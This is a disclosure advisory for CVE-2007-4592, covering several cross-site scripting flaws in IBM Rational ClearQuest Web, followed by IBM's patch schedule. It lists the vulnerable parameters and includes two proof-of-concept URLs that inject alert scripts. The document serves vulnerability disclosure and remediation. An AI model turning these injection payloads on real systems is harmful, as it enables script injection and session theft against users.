IBM Rational ClearQuest Web Multiple XSS
CVE-2007-4592
Discovered on 07-24-07 by sasquatch of SecureState - www.securestate.com
Multiple cross site scripting vulnerabilities exist within IBM's Rational ClearQuest Web interface.
VULNERABLE VARIABLES:
=====================
contextid (query string parameter)
schema (query string parameter)
userNameVal ("User Name" text box)
POC URL: http://www.website.com/cqweb/login?/cqweb/main?command=GenerateMainFrame
&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');//
VULNERABLE VARIABLE:
====================
username (query string parameter)
POC URL: http://www.website.com/cqweb/login?targetUrl=/cqweb/main?command=Generat
eMainFrame&ratl_userdb=DBHERE,&test=&clientServerAddress=http://www.webs
ite.com/cqweb/login&username=test</script><script>alert('xss')</script>&
password=test&schema=SCHEMAHERE&userDb=DBHERE
VENDOR RESPONSE:
================
Test fixes are now available from IBM Rational Support for versions 2003.06.16 Patch 2007C, 7.0.0.1_iFix04, and 7.0.1.0_iFix01.
These are the latest available patch releases before December 19, 2007.
Test fixes will be made available from IBM Rational Support some time in January 2008 for versions 2003.06.16 Patch 2007D, 7.0.0.2, and 7.0.1.1.
These patch releases became available on December 19, 2007 but there was no time to fix this vulnerability in these releases.
For this reason, we will provide test fixes that do fix it some time in the middle or latter half of January 2008.
The following patch releases will fix this vulnerability: 2003.06.16 Patch 2008A, 7.0.0.2_iFix01, and 7.0.1.1_iFix01.
These patch releases were made available on March 4th, 2008.
Test fixes are only available by calling IBM Rational Support, which then provides them to customers.
Patch releases are available via download. Please contact IBM Rational Support for detailed information.